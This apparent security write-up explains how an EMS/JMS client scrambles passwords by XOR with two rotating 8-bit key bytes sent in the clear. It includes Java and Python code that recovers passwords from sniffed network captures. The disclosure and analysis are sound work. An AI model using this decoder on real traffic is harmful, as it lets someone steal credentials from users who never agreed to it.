EMS Traffic
The password field is neither hashed nor really encrypted: the password is XORed with two random 8-bit key bytes (one for even positions, one for odd), each rotated right by one bit after every use, and both key bytes are sent along with the ciphertext. This is the scrambling routine:
```java
import java.util.Random;

// Scrambling of the password field before it goes on the wire.
static byte[] scramblePassword(byte[] pass) {
    int len = pass.length;
    int lenPadded;
    if (len % 16 != 0)
        lenPadded = (len / 16 + 1) * 16 + 4;      // 4-byte header + password padded to a 16-byte multiple
    else
        lenPadded = len + 4;
    byte pwd[] = new byte[lenPadded];
    Random random = new Random(System.currentTimeMillis());   // time-seeded: not even unpredictable
    System.arraycopy(pass, 0, pwd, 4, pass.length);
    for (int k = len + 4; k < lenPadded; k++)
        pwd[k] = (byte) random.nextInt();           // random padding after the password
    int i;
    do i = random.nextInt(); while (i == 0 || i == -1);
    byte byte1 = (byte) i;                            // key byte for even positions
    byte byte2 = (byte) (i >> 8);                     // key byte for odd positions
    pwd[0] = byte1;                                   // both key bytes stored in the clear
    pwd[1] = byte2;
    pwd[2] = (byte) ((len + 7777) ^ pwd[1]);          // low byte of (len + 7777), XOR byte2
    pwd[3] = (byte) (((len + 7777) >> 8) ^ pwd[0]);   // high byte of (len + 7777), XOR byte1
    for (int l = 4; l < lenPadded; l++) {             // header bytes 0..3 are never XORed
        byte byte0 = l % 2 == 0 ? byte1 : byte2;
        pwd[l] = (byte) (pwd[l] ^ byte0);
        int j = byte0 & 1;                            // rotate the key byte right by one bit
        byte0 >>= 1;
        if (j != 0) byte0 |= 128; else byte0 &= 127;
        if (l % 2 != 0) byte2 = byte0; else byte1 = byte0;
    }
    return pwd;
}
```

Have you noticed that the keys are left in pwd at indices 0 and 1?!
Here is how to get the password from sniffed JMS communication:

```java
// Recovering the password from a captured message: the key bytes are pwd[0] and pwd[1].
static void printPassword(byte[] pwd) {
    byte byte1 = pwd[0];
    byte byte2 = pwd[1];
    for (int z = 4; z < pwd.length; z++) {
        byte byte0 = z % 2 == 0 ? byte1 : byte2;
        char c = (char) (byte) (pwd[z] ^ byte0);
        if (!Character.isDefined(c)) break;   // heuristic end of password: random padding follows it
        System.out.print(c);
        int j = byte0 & 1;                    // same rotate-right as the scrambler
        byte0 >>= 1;
        if (j != 0) byte0 |= 128; else byte0 &= 127;
        if (z % 2 != 0) byte2 = byte0; else byte1 = byte0;
    }
}
```

`Character.isDefined` is only a heuristic for where the password ends, because the padding bytes are random and may well be printable; the exact length is in the message too: `((pwd[3] ^ pwd[0]) & 0xff) << 8 | ((pwd[2] ^ pwd[1]) & 0xff)`, minus 7777.

Damn, even keeping these two key bytes out of the message (say, agreeing them with Diffie-Hellman) would not make this secure: an unauthenticated exchange is open to a man in the middle, and two 8-bit key bytes are a 16-bit key that a passive sniffer brute-forces in no time. The key size of 8 bits is a totally brilliant idea. The real fix is TLS on the connection, not a cleverer scrambler.
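The following is an added example, not code from the original post or from the EMS client: a Python re-implementation of the scrambling above together with a decoder that does not guess where the password ends but reads the length back from header bytes 2 and 3, which the scrambler writes as (len + 7777) XORed with the key bytes. The byte layout and the 7777 offset are taken from the Java; the sample password, key and padding are constructed here for the demonstration.

```python
"""Scramble / unscramble the EMS password field (XOR with two rotating 8-bit key bytes).

Added example; layout and constants follow the Java routine above,
the exact-length recovery follows from how header bytes 2 and 3 are written.
"""
import os
from typing import Optional

MAGIC = 7777   # offset added to the password length before it is stored in the header


def _ror8(k: int) -> int:
    """Rotate an 8-bit key byte right by one bit (the 'shifting key' step)."""
    return ((k >> 1) | ((k & 1) << 7)) & 0xFF


def padded_length(n: int) -> int:
    """4-byte header plus the password rounded up to a multiple of 16 bytes."""
    return (n // 16 + 1) * 16 + 4 if n % 16 else n + 4


def scramble(password: bytes, key: Optional[int] = None, pad: Optional[bytes] = None) -> bytes:
    """Produce the wire form. key is the 16-bit key (low byte -> even positions,
    high byte -> odd positions); key and pad default to random, as in the client."""
    n = len(password)
    total = padded_length(n)
    if key is None:
        key = int.from_bytes(os.urandom(2), "little")
    if pad is None:
        pad = os.urandom(total - 4 - n)
    if len(pad) != total - 4 - n:
        raise ValueError("pad must be exactly %d bytes" % (total - 4 - n))
    k1, k2 = key & 0xFF, (key >> 8) & 0xFF
    out = bytearray(total)
    out[0], out[1] = k1, k2                          # the key, stored in the clear
    out[2] = ((n + MAGIC) & 0xFF) ^ k2               # low byte of (len + 7777) XOR k2
    out[3] = (((n + MAGIC) >> 8) & 0xFF) ^ k1        # high byte of (len + 7777) XOR k1
    out[4:4 + n] = password
    out[4 + n:] = pad
    for i in range(4, total):                        # header bytes 0..3 are never XORed
        if i % 2 == 0:
            out[i] ^= k1
            k1 = _ror8(k1)
        else:
            out[i] ^= k2
            k2 = _ror8(k2)
    return bytes(out)


def recover_length(blob: bytes) -> int:
    """Undo the header: ((blob[3] ^ blob[0]) << 8 | (blob[2] ^ blob[1])) - 7777."""
    return (((blob[3] ^ blob[0]) << 8) | (blob[2] ^ blob[1])) - MAGIC


def unscramble(blob: bytes) -> bytes:
    """Recover the password from a captured field using only the bytes on the wire.
    The length comes from the header, so printable random padding cannot leak
    into the result the way a 'stop at the first undefined char' heuristic allows."""
    if len(blob) < 4 or (len(blob) - 4) % 16:
        raise ValueError("not a scrambled password field")
    k1, k2 = blob[0], blob[1]
    n = recover_length(blob)
    if not 0 <= n <= len(blob) - 4:
        raise ValueError("length field does not decode; wrong key layout?")
    out = bytearray()
    for i in range(4, len(blob)):
        if i % 2 == 0:
            out.append(blob[i] ^ k1)
            k1 = _ror8(k1)
        else:
            out.append(blob[i] ^ k2)
            k2 = _ror8(k2)
    return bytes(out[:n])


if __name__ == "__main__":
    # Constructed sample: scramble a made-up password with a random key, then read it
    # back from the wire bytes alone, exactly as a passive sniffer would.
    wire = scramble(b"s3cret-pa55")
    print("wire bytes:             ", wire.hex())
    print("key bytes in the clear: ", wire[:2].hex())
    print("length field decodes to:", recover_length(wire))
    print("password:               ", unscramble(wire).decode())
```

Feeding `unscramble` a captured field from a pcap (the 4-byte header plus a 16-byte-multiple body) is enough to get the password; there is no key to brute-force because the key travels in the first two bytes.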